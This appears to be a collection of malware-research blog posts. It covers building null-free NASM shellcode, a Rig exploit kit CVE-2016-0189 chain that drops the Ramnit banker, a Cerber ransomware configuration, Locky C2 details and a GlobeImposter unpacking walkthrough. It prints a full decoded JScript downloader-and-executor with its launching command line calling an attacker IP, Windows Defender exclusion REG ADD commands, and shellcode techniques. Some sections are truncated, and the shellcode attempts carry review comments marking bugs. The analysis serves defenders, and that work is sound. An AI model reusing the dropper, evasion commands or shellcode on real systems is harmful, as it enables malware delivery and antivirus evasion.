Let’s Learn: Preparing Shellcode in NASM

Goal: Create a neat, “00”-free shellcode in NASM for exploit bundling
Source: OpenSecurityTraining “Software Exploits”
Attempt I:

; ;;;;;;;;;;;;;;;;;;;;;;;; 
; basic ‘Hello World’ in nasm
; compile with nasm -f elf hello.asm; ld -o hello hello.o
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
; ;;;;;;;;;;;;;;;;;;;;;;;;
; 12 bytes: the 11 characters of the text plus a trailing newline (0xa)
msg db ‘Hello World’, 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
; NOTE(review): the symbol exported here is _start, but the label defined
; below is `start` (no underscore), so _start is never defined; ld normally
; warns about the missing entry symbol and falls back to the beginning of .text.
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; write(int fd, char *msg, unsigned int len)
; i386 Linux convention: eax = syscall number, ebx/ecx/edx = arguments;
; the result comes back in eax (negative value = -errno).
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 4                      ; eax = __NR_write on i386
mov ebx, 1                      ; fd = 1 (stdout)
mov ecx, msg                    ; buf = absolute address of msg (32-bit immediate; ties the code to this .data layout)
mov edx, 8                      ; len = 8, so only "Hello Wo" of the 12-byte message is written
int 0x80                        ; enter the kernel
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(int ret)
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 1                      ; eax = __NR_exit on i386
mov ebx, 0                      ; ret = 0
int 0x80                        ; does not return

Attempt II (use the low-byte forms of the registers instead of the full extended registers):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
; ;;;;;;;;;;;;;;;;;;;;;;;;
; 12 bytes: text plus a trailing newline (0xa); only 8 of them are written below
msg db ‘Hello World’, 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
; NOTE(review): as in Attempt I, the exported symbol is _start while the label
; is `start`, so the entry symbol is never defined.
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; write(1, msg, 8) — the 8-bit forms below write only bits 0-7 of a register;
; bits 8-31 keep whatever they held before, and int 0x80 reads the whole of
; eax/ebx/edx, so this relies on those registers already being zero on entry.
mov al, 4                       ; low byte of eax = __NR_write
mov bl, 1                       ; low byte of ebx = fd 1 (stdout)
mov ecx, msg                    ; buf = absolute address of msg (still a fixed 32-bit immediate)
mov dl, 8                       ; low byte of edx = len 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(0) — the same partial-register caveat applies to eax and ebx here
mov al, 1                       ; low byte of eax = __NR_exit
mov bl, 0                       ; low byte of ebx = status 0
int 0x80

Attempt III (make the code position-independent):
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need
; (xor reg, reg zeroes the full 32-bit register, so the 8-bit moves below
; now yield well-defined values in eax/ebx/edx regardless of entry state)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4                       ; eax = __NR_write (i386)
mov bl, 1                       ; ebx = fd 1 (stdout)
; Owned!! = 4f,77,6e,65,64,21,21,0xa
; The message is built on the stack instead of in .data so the code no longer
; depends on a fixed address. Each push stores its dword little-endian, so the
; dword pushed last holds the first bytes of the string.
; push \n,!,!,d
push 0x0a212164                 ; bytes in memory: 64 21 21 0a = "d!!\n"
; push e,n,w,O
push 0x656e774f                 ; bytes in memory: 4f 77 6e 65 = "Owne"; esp now points at "Owned!!\n"
; NOTE(review): ecx is still 0 from the xor above — the address of the string
; just built (esp) is never copied into ecx, so this write() receives a NULL
; buffer and fails with -EFAULT; nothing is printed.
mov dl, 8                       ; edx = len 8 (the two pushed dwords)
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(0)
mov al, 1                       ; eax = __NR_exit
mov bl, 0                       ; ebx = status 0
int 0x80

Attempt IV (remove 0xa newline):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need
; (xor reg, reg zeroes the full 32-bit register, so the 8-bit moves below
; now yield well-defined values in eax/ebx/edx regardless of entry state)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4                       ; eax = __NR_write (i386)
mov bl, 1                       ; ebx = fd 1 (stdout)
; Owned!!! = 4f,77,6e,65,64,21,21,21  (the trailing 0xa of Attempt III is replaced by a third '!')
; Each push stores its dword little-endian, so the dword pushed last holds the
; first bytes of the string.
; push !,!,!,d
push 0x21212164                 ; bytes in memory: 64 21 21 21 = "d!!!"
; push e,n,w,O
push 0x656e774f                 ; bytes in memory: 4f 77 6e 65 = "Owne"; esp now points at "Owned!!!"
; NOTE(review): as in Attempt III, ecx is still 0 from the xor above — the
; address of the string just built (esp) is never copied into ecx, so this
; write() receives a NULL buffer and fails with -EFAULT; nothing is printed.
mov dl, 8                       ; edx = len 8 (the two pushed dwords)
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(0)
mov al, 1                       ; eax = __NR_exit
mov bl, 0                       ; ebx = status 0
int 0x80

Cridex/Geodo/Emotet/Dridex Node Map Visualizer

Goal: Visualize all possible Cridex/Geodo/Emotet/Dridex node infections on the map using Fusion Map
Source: OSINT and other feed intel
https://fusiontables.google.com/embedviz?containerId=googft-gviz-canvas&viz=GVIZ&t=GRAPH&gc=true&gd=true&sdb=1&rmax=100000&q=select+col6%2C+col0%2C+col3+from+1uZfgN0_tazPf9UVoIIiptra5ByDAanDFIcGX384g&qrs=+where+col6+%3E%3D+&qre=+and+col6+%3C%3D+&qe=&uiversion=2&state=%7B%22ps%22%3A%221_2_-10_o_0_-a_-1f_95_y_5z_bg_-1h_1u_ae_-9_-d_am_-29_1l_ri_-2_5w_ql_-b_-q_o4_-1g_-j_5t_-t_-h_16_-x_1v_4n_-1w_-v_hi_-2k_o_pz_-3_56_y_f_a_nt_-2c_g_de_-28_3_f4_-2c_y_eg_-2p_17_eh_-x_29_n1_-1v_1m_qv_-2m_z_6s_-1o_28_5q_-y_-p_mw_-g_1u_kz_-23_18_n0_-1c_23_qn_-2s_s_e8_-21_-4_pe_-f_25_ox_-2o_2_rd_-25_-q_nh_-o_23_nd_-2m_1f_3b_-1t_-2d_7o_-2e_1t_62_-22_9_k1_-3_0_ia_-4_1k_px_3_1b_83_-23_1i_mq_-6_23_1c_-1m_-y_km_-2e_17_ma_-28_q_eq_-1z_1w_qt_-1c_2d_ad_-2_1t_2l_-1m_-a_qc_1x_52_qj_-19_66_l5_a_15_nv_5_g_gv_-o_2l_m0_-2h_24_gg_-l_2d_17_j_1s_j7_-o_2u_gw_-y_-17_4m_3_-i_qq_1e_5g_w_-22_-1c_5i_k_x_30_1_-3y_pv_a_63_qi_1t_5i_3s_-8_-4k_t_-30_-9_2a_-x_-2p_l3_7_-1g_56_i_-26_3u_24_-a_3v_1p_-q_no_1e_-1e_q3_-1j_3s_12_1p_3_5g_f_-4i_4s_r_-6_og_-y_2j_5p_-2g_-c_53_-2l_-j_3k_-s_-y_2x_s_-4e_8o_-1m_2i_63_-2i_-1g_i_2f_-34_3l_1l_-1c_ag_-2k_2f_p9_-2a_2c_61_-3n_1r_nb_-1u_3q_q_-24_2k_84_a_2o_5n_v_3_la_g_-1s_iw_0_-1s_3g_-1e_-1s_es_-o_-1s_er_-x_-1h_bo_-31_-18_pd_-u_5r_1w_-32_1s_p_-3j_2p_2v_12_12_1v_-33_f_e_-3e_24_j1_-2b_-1a_67_-a_2g_gn_-1s_-1e_73_-1_2e_e9_-2t_2f_b5_29_1g_dk_-16_2m_m6_-2q_-27_3r_-1y_-4b_mo_3_-z_ek_-2a_-2f_ev_-49_-3_d4_-2c_33_92_-1f_2p_fs_-2w_1z_l7_-32_1b_ay_-36_-f_eo_-1m_-1m_aw_-2x_1k_at_-2c_3q_r2_-2g_-11_qz_27_13_jm_-1w_3x_9k_-3s_-18_9j_-1_-1z_jn_u_3i_dl_-1n_2t_4q_-2b_-45_8v_-4d_11_au_-2x_5_49_9_-5_7t_-2q_-z_6h_-3c_13_2o_-28_-1j_3d_1y_-y_3_-3x_-14_34_-1d_-t_4y_-37_20_65_1r_1s_bs_-4d_1h_46_26_1r_nu_-2_-q_32_22_-r_ow_14_6l_p3_24_6h_p2_-8_6h_oz_a_6t_ol_o_-1t_a_-p_-2g_m2_1i_2f_5s_-3l_14_kq_1y_1e_94_-f_-2f_j0_%22%2C%22cx%22%3A20.806092585307955%2C%22cy%22%3A-17.32674591826775%2C%22sw%22%3A1554.5151079090979%2C%22sh%22%3A679.3283956242936%2C%22z%22%3A0.25048044372185396%7D&gco_forceIFrame=true&gco_hasLabelsColumn=true&att
=true&width=800&height=500 https://fusiontables.google.com/embedviz?q=select+col1+from+1uZfgN0_tazPf9UVoIIiptra5ByDAanDFIcGX384g&viz=MAP&h=false&lat=28.269753263159743&lng=-6.4424593749999985&t=3&z=2&l=col1&y=2&tmplt=2&hml=TWO_COL_LAT_LNG 

Heatmap Node Map

Let’s Learn: In-Depth Reversing Rig Exploit Kit’s VBScript Memory Corruption (CVE-2016-0189)

Goal: Reverse the latest exploit payload (CVE-2016-0189) from the Rig Exploit Kit (RigEK) and its chain leading to Ramnit banker based on the user-agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).
Source: Seamless gate leading to RigEK and Ramnit banker.
Tools: Fiddler, Internet Explorer, Firefox Web-Developer plugin



The observed URI parameters are from the RigEK URI 81.177.140[.]137 (AS8342 RTCOMM-AS, RU):

  • NjA0MjE0/NDg3NDE4
  • mano
  • pano
  • gift
  • work
Background
While investigating the Rig EK, I observed it serving the CVE-2016-0189 (VBScript Memory Corruption) exploit to the user-agent string “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).” Previously, the same exploit kit served the CVE-2015-8651 Adobe Flash exploit for the same user-agent string.

Steps:
(1) Obtain the RigEK response from Fiddler.
(2) Debug the payload in Web-Developer plugin by setting up the breakpoint on bx or return and copying the decoded payload.


(3) Observe the full decoded VBS code from RigEK’s CVE-2016-0189 function, which is almost an exact copy of the GitHub CVE-2016-0189 page (apart from a few renamed variables and ShellExecute being replaced by Run for obfuscation purposes). For reference, CVE-2016-0189 is also known as the “Scripting Engine Memory Corruption Vulnerability.”


(4) Finally, observe the Ramnit banker drop from the RigEK leveraging the exploit.

The CVE-2016-0189 exploit allows remote code execution and transfers control to the following decoded, beautified cmd command, which downloads an encoded binary, decrypts it, and runs the Ramnit banker:


cmd.exe / q / c cd / d “%tmp%” && echo

// Builds a pseudo-random base-36 string of (typically) l characters: a value in
// [36^(l+1) - 36^l, 36^(l+1)] is rendered with toString(36) and its leading digit
// dropped. Used below as the random part of the dropped file's name.
// Note: A (= Math) is assigned by the try block further down, not passed in.
function O(l) {
    var w = “pow”,
        j = 4 * 9;                      // 36 — the radix
    return A.round((A[w](j, l + 1) – A.random() * A[w](j, l))).toString(j)[“slice”](1)
};

// Downloads the payload. k is the script's WScript.Arguments collection (see the
// call site below): k(1) = URL, k(2) = User-Agent, k(n) = k(0) = decode key.
// Uses WinHTTP.WinHTTPRequest.5.1 synchronously (open(..., 1) + WaitForResponse)
// with the default proxy setting; Option(0) is the user-agent string, so the
// request carries the same UA that selected the exploit. On HTTP 200 the body is
// handed to _() for decoding; any other status returns undefined, which the
// caller does not check (its v.charCodeAt then throws into the outer catch).
function V(k) {
    var y = a(e + “.” + e + “Request.5.1”);
    y.setProxy(n);
    y.open(“GET”, k(1), 1);
    y.Option(n) = k(2);
    y.send();
    y.WaitForResponse();
    if (200 == y.status) return _(y.responseText, k(n))
};

// RC4 over string k with key e, written out inline:
//   loop 1 — identity S-box c[0..255];
//   loop 2 — key scheduling (KSA): swap c[b] and c[l] driven by the key bytes;
//   loop 3 — keystream generation (PRGA) XORed into each byte of k.
// F = 5 + 5*50 = 255 is the byte mask. The '^' characters before '>', '<', '&'
// and the doubled '^ ^' are cmd.exe escape sequences left over from the echo
// command that wrote this file; read them as plain >, <, &, ^.
function _(k, e) {
    for (var l = 0, n, c = [], F = 5 + 5 * 50, S = String, q = [], b = 0; 256 ^ > b; b++) c[b] = b;
    for (b = 0; 256 ^ > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) ^ & F, n = c[b], c[b] = c[l], c[l] = n;
    for (var p = l = b = 0; p ^ < k.length; p++) b = b + 1 ^ & F, l = l + c[b] ^ & F, n = c[b], c[b] = c[l], c[l] = n, q.push(S.fromCharCode(k.charCodeAt(p) ^ ^ c[c[b] + c[l] ^ & F]));
    return q.join(“”)
};
// Top-level dropper logic. Everything runs inside a catch-all so that any
// failure (no network, missing ActiveX object, ...) ends silently.
try {
    // u = WScript host object; a(b) = WScript.CreateObject(b), built via
    // Function() from string fragments so the name does not appear literally.
    u = WScript, o = “Object”, A = Math, a = Function(“b”, “retu” + “rn u.Create” + o + “(b)”);
    // ("" + WScript) is "Windows Script Host", so P = "Script":
    // q = Scripting.FileSystemObject, j = WScript.Shell, s = ADODB.Stream,
    // m = command-line arguments, K = WScript.ScriptFullName,
    // x = random 8-char base-36 name + "."; the rest are string fragments used below.
    P = (“” + u).split(” “)[1], M = “indexOf”, q = a(P + “ing.FileSystem” + o), m = u.Arguments, e = “WinHTTP”, Z = “cmd”, U = “DEleTefIle”, j = a(“W” + P + “.Shell”), s = a(“ADODB.Stream”), x = O(8) + “.”, p = “exe”, n = 0, K = u[P + “FullName”], E = “.” + p;
    s.Type = 3 – 1;                 // 2 = adTypeText
    s.Charset = “iso-8859-1”;       // keeps every byte value 0-255 intact through WriteText
    s.Open();
    // Download + decode, with a single retry on failure.
    try {
        v = V(m)
    } catch (W) {
        v = V(m)
    };
    // Reads the byte 21 past the "PE\0\0" signature — presumably meant to test the
    // IMAGE_FILE_DLL bit of the PE Characteristics field — to pick .dll vs .exe.
    d = v.charCodeAt(20 + 1 + v[M](“PE\x00\x00”));
    s.WriteText(v);
    h = “dll”;
    if (31 ^ < d) {                 // cmd-escaped: if (31 < d)
        var z = 1;
        x += h
    } else x += p;
    s.savetofile(x, 2);             // 2 = adSaveCreateOverWrite; relative to the cwd set by the outer cmd line (%tmp%)
    s.Close();
    C = ” /c “;
    Y = “gsvr32”;
    // For a DLL the file is run through regsvr32 /s; either way the launch is
    // "cmd.exe /c ..." with window style 0 (hidden). The script deletes itself
    // afterwards (q[U](K) = FileSystemObject.DeleteFile(ScriptFullName)).
    z ^ & ^ & (x = “re” + Y + E + ” /s ” + x);
    j.run(Z + E + C + x, 0)
} catch (N) {};
q[U](K); > o32.tmp && start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)” “http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


The shortened relevant function is as follows (commented):

start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)”http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


Indicators of Compromise (IOCs):
08-15-2017 – RigEK server 81.177.140[.]137 (AS8342 RTCOMM-AS, RU)
08-15-2017 – RigEK exploit CVE-2016-0189 landing
SHA-1: 7993998d5f50bb7a3f8575fdfdb93f3386dbacde
Link
08-15-2017 – Ramnit Banker 
SHA-1: 667d40d8c7c10f027ac57e91c509ddd56b8bc736


Let’s Learn: How to Obtain Cerber (CRBR) Ransomware Configuration

Goal: Learn how to obtain the Cerber ransomware (CRBR encryptor) configuration by leveraging its string-compare call to StrCmpNIA from SHLWAPI.dll.
Source: Malwarebytes

SHA-1: 4BDD366D8EE35503CF062AE22ABE5A4A2D8D8907 
Tools: OllyDbg, CFF Explorer

Background:
This reversing technique is based on a source-code-level understanding of the Cerber string-parsing function that leverages the “SHLWAPI” library; the initial discovery came from that same source-code-level understanding of the ransomware.
Steps:
  • Observe the malware in CFF Explorer and its import address table (IAT). Note that the malware does not import the above-referenced SHLWAPI library, so we have to wait until the malware loads this library dynamically.
  • Go to “Options” -> “Events” and set up a check on “Break on new module (DLL)”
  • Observe the loaded SHLWAPI library in the DLL section.
  • Go to “Expression to follow” and enter “StrCmpNIA” and remove the initial check on “Break on new module (DLL)”
  • Run until you observe the StrCmpNIA function with the following call:
0012FB84   00403DBA  /CALL to StrCmpNIA
0012FB88   0129DCD0  |S1 = “{“blacklist”:…}”
0012FB8C   01299548  |S2 = “NULL”
0012FB90   00000004  \N = 4
  • Backup and save the data to file. Enjoy!
Here is the full extracted Cerber config:

{“blacklist”:{“files”:[“bootsect.bak”,”iconcache.db”,”ntuser.dat”,”thumbs.db”],”folders”:[“:\\$getcurrent\\”,”:\\$recycle.bin\\”,”:\\$windows.~bt\\”,”:\\$windows.~ws\\”,”:\\boot\\”,”:\\documents and settings\\all users\\”,”:\\documents and settings\\default user\\”,”:\\documents and settings\\localservice\\”,”:\\documents and settings\\networkservice\\”,”:\\intel\\”,”:\\logs\\”,”:\\msocache\\”,”:\\perflogs\\”,”:\\program files (x86)\\”,”:\\program files\\”,”:\\programdata\\”,”:\\recovery\\”,”:\\recycled\\”,”:\\recycler\\”,”:\\system volume information\\”,”:\\system.sav\\”,”:\\temp\\”,”:\\windows.old\\”,”:\\windows10upgrade\\”,”:\\windows\\”,”:\\winnt\\”,”\\appdata\\local\\”,”\\appdata\\locallow\\”,”\\appdata\\roaming\\”,”\\local settings\\”,”\\public\\music\\sample music\\”,”\\public\\pictures\\sample pictures\\”,”\\public\\videos\\sample videos\\”,”\\tor browser\\”],”languages”:[1049,1058,1059,1064,1067,1068,1079,1087,1088,1090,1091,1092,2072,2073,2092,2115]},”check”:{“language”:1},”debug”:0,”default”:{“bchn”:”1GcnsLs7C31uuroNmUHwwbB5xQeNvm63Ee”,”site_1″:”tor2web-.org”,”site_2″:”onion.link”,”site_3″:”onion.nu”,”site_4″:”onion.cab”,”site_5″:”onion.to”,”tor”:”oqwygprskqv65j72″},”encrypt”:{“bytes_skip”:2048,”divider”:327680,”encrypt”:1,”files”:[[“.doc”,”.docx”,”.xls”,”.xlsx”,”.jpg”,”.jpeg”,”.pdf”,”.rar”,”.zip”,”.ppt”,”.pptx”,”.avi”,”.mpg”,”.mpeg”,”.wmv”]],”max_block_size”:16,”min_file_size”:3072,”multithread”:1,”network”:1,”rsa_key_size”:880,”threads_per_core”:1},”global_public_key”:”LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLW
EExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==”,”help_files”:{“files”:[{“file_body”:”REDACTED”,”file_extension”:”.txt”}],”files_name”:”_HOW_TO_DECRYPT_MY_FILES_{RAND}_”,”run_by_the_end”:1},”self_deleting”:1,”servers”:{“statistics”:{“data_finish”:”e01ENV9LRVl9″,”data_start”:”e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=”,”ip”:[“15.42.13[.0/27″,”44.66.140[.0/27″,”87.98.176[.0/22″],”port”:6893,”send_stat”:1,”timeout”:255}},”wallpaper”:{“change_wallpaper”:1,”background”:139,”color”:16777215,”size”:13,”text”:”                     \n   CRBR ENCRYPT0R    \n                     \n\n  Y0UR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMP0RTANT FILES  \n  HAVE BEEN ENCRYPTED!  \n\n  The only way to decrypt your files is to receive  \n  the private key and decryption program.  \n\n  To receive the private key and decryption program  \n  go to any decrypted folder – inside there is the special file (*_R_E_A_D___T_H_I_S_*)  \n  with complete instructions how to decrypt your files.  \n\n  If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC,  \n  follow the instructions below:  \n\n  1. Download \”Tor Browser\” from https://www.torproject.org/ and install it.  \n  2. In the \”Tor Browser\” open your personal page here:  \n\n  http://{TOR}.onion/{PC_ID}  \n\n  Note! This page is available via \”Tor Browser\” only.  \n\n\n”},”whitelist”:{“folders”:[“\\bitcoin\\”,”\\excel\\”,”\\microsoft sql server\\”,”\\microsoft\\excel\\”,”\\microsoft\\microsoft sql server\\”,”\\microsoft\\office\\”,”\\microsoft\\onenote\\”,”\\microsoft\\outlook\\”,”\\microsoft\\powerpoint\\”,”\\microsoft\\word\\”,”\\office\\”,”\\onenote\\”,”\\outlook\\”,”\\powerpoint\\”,”\\steam\\”,”\\the bat!\\”,”\\thunderbird\\”,”\\word\\”]}}

08-10-2017 – Rig Exploit Kit Leads to Ramnit aka "demetra" Banker via CVE-2015-8651

Goal: Reverse the Rig Exploit Kit infection chain leading to Ramnit “demetra” banking Trojan.
Source: Malicious traffic
Tools: Fiddler, JPEXS, OllyDBG

Traffic Chain: 

Seamless gate ->
-> Rig EK Landing ->  
http://188.225.78%5B.%5D174/?MTUzNzcy&pan=..&man=..&work=..
-> Rig EK CVE-2015-8651 Adobe Flash exploit
http://188.225.78%5B.%5D174/?NDYzMzgw&pan=..&man=..&shop=..
-> Ramnit Payload
%TEMP%
-> Ramnit Payload (via its getexec command)


I. RigEK’s observed URI parameters are as follows (User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)):

  • MTUzNzcy (base64 landing)
  • NDYzMzgw (base64 exploit)
  • man
  • pan
  • work
  • shop
II. Adobe Flash Player Exploit (CVE-2015-8651):
Upon successful exploitation of the integer overflow vulnerability (si32 and li32), the exploit runs shellcode that downloads and executes the Ramnit banker. See more here.
Interesting function name

cremea_freedom

Ramnit aka “demetra” banking Trojan (dropped in %TEMP%; as an anti-analysis trick it appends “:Zone.Identifier” to its svchost[.]exe path string and attempts to remove that stream, and it leverages a User Account Control (UAC) bypass method based on application compatibility databases installed with sdbinst[.]exe):

  • AvTrust
  • Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)
  • XX’S
  • Chrome reinstall
  • Chrome reinstall module (x64-x86) v0.1
  • CookieGrabber
  • Cookie Grabber v0.2 (no mask)
  • FtpGrabber2
  • Ftp Grabber v2.0
  • XX’S
  • Hooker
  • Spy module (Zeus, SE, Rootkit, Ignore SPDY) v4
  • VNC IFSB
  • VNC IFSB x64-x86

Ramnit anti-virus exclusion registry script:

  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0 

Targets US-based financial institutions leveraging its webinjects (same as 8-7-2017):
Indicators of compromise (IOCs):
Rig EK Landing:
Rig EK CVE-2015-8651 Exploit Flash integer overflow vulnerability:

Ramnit initial:

Ramnit getexec payload: 

Let’s Analyze Locky ".diablo6" Ransomware

Goal: Review the latest Locky “.diablo6” campaign via stepping into user calls and reviewing relevant functions.
Source I: 
Packed Locky (SHA-1: b4dc5f5d47b87baa0be87afda5ccee1f00497984)
Source II:
Unpacked Locky first-layer (SHA-1: 5ed85179386ae994b5ed8ef3a60a2ec5134bd68a)

Tool: OllyDBG
Brief overview:

Locky ransomware appears to have altered its payload encryption; it heavily leverages dynamic API loading for its calls and now gzip-encodes its traffic.

C2 (POST /checkupdate):

83.217.8[.]61, 31.202.130[.]9, 91.234.35[.]106

Locky extension

.diablo6

POST requests (now gzip-encoded):

&act=getkey &affid= .unknown..&serv=..&lang=..&corp=..&x64=..&v=2..&os=..&sp..id

Targeted extensions:

Locky instructions:

Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware

Goal: Unpack the GlobeImposter ransomware payload by dumping the buffer passed to the WriteProcessMemory API (the same method used for Locky in the previous post).
Tools: OllyDbg, CFF Explorer, IDA Pro
Credit: @dvk01uk
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:

Background
GlobeImposter ransomware uses a loader/patcher routine that patches the decoded payload into memory.

Theory
GlobeImposter ransomware patches itself: it calls the CreateProcessA API with the creation flag set to CREATE_SUSPENDED and writes itself into the new process via the WriteProcessMemory API. The suspended process does not run until ResumeThread is called, so the ransomware has time to patch it in memory.

Practice:
I. Load Ollydbg and click “File” ->
II. Click “Go to” -> “Expression” -> Type “WriteProcessMemory” and set up a breakpoint on it using F2.
III. Run the process using F9 and follow buffer to observe the unpacked GlobeImposter in the dump section.
IV.  Then, click on “Backup” -> “Save data to file.”
V. Verify the exported payload and IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
(a) Registry persistence:

HKEY\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\CertificatesCheck
(b) GlobeImposter vssadmin & batch script:
  // Hex-Rays fragment (function signature, locals and closing brace not shown).
  // Creates %TEMP%\__tmp*.bat, writes a batch script into it and passes the path
  // to sub_4126D7 (presumably the routine that runs it). As the literal below
  // shows, the script deletes all volume shadow copies (vssadmin), wipes the RDP
  // client's saved-server history and Default.rdp, then clears every Windows
  // event log (wevtutil el / wevtutil cl). For detection, these child commands
  // — vssadmin.exe "Delete Shadows" and wevtutil.exe "cl" in a loop, spawned
  // from a freshly written .bat in %TEMP% — are the high-signal events.
  GetTempFileNameW(&PathName, L”__tmp”, 0, &TempFileName);
